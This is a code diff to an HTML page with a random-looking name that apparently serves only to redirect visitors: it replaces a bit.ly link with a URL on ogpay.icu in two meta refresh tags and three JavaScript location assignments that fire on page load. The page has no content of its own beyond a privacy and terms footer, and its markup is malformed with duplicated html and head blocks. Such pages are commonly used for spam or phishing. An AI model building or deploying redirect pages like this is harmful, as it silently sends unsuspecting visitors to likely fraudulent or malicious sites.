--- a/kgtxrh.html
+++ b/kgtxrh.html
@@ -4,15 +4,15 @@
 
 </head><html>
 <head>
-<meta http-equiv="refresh" content="0;URL=https://bit.ly/3rz17cp" />
+<meta http-equiv="refresh" content="0;URL=https://ogpay.icu/d/60e1ca4597ba5" />
 </head>
 <body>
 
 
 <script type="text/javascript">
-window.location="https://bit.ly/3rz17cp";
-location="https://bit.ly/3rz17cp";
-document.location="https://bit.ly/3rz17cp";
+window.location="https://ogpay.icu/d/60e1ca4597ba5";
+location="https://ogpay.icu/d/60e1ca4597ba5";
+document.location="https://ogpay.icu/d/60e1ca4597ba5";
 </script>
 <center><a href="privacy-policy.html">Privacy policy</a> | <a href="terms.html">Terms and Conditions</a></center></body>
 </html>
@@ -20,6 +20,6 @@ document.location="https://bit.ly/3rz17cp";
 
 <html>
   <head>
-<meta http-equiv="refresh" content="1;URL=https://bit.ly/3rz17cp" />
+<meta http-equiv="refresh" content="1;URL=https://ogpay.icu/d/60e1ca4597ba5" />
 </head>
   </html>
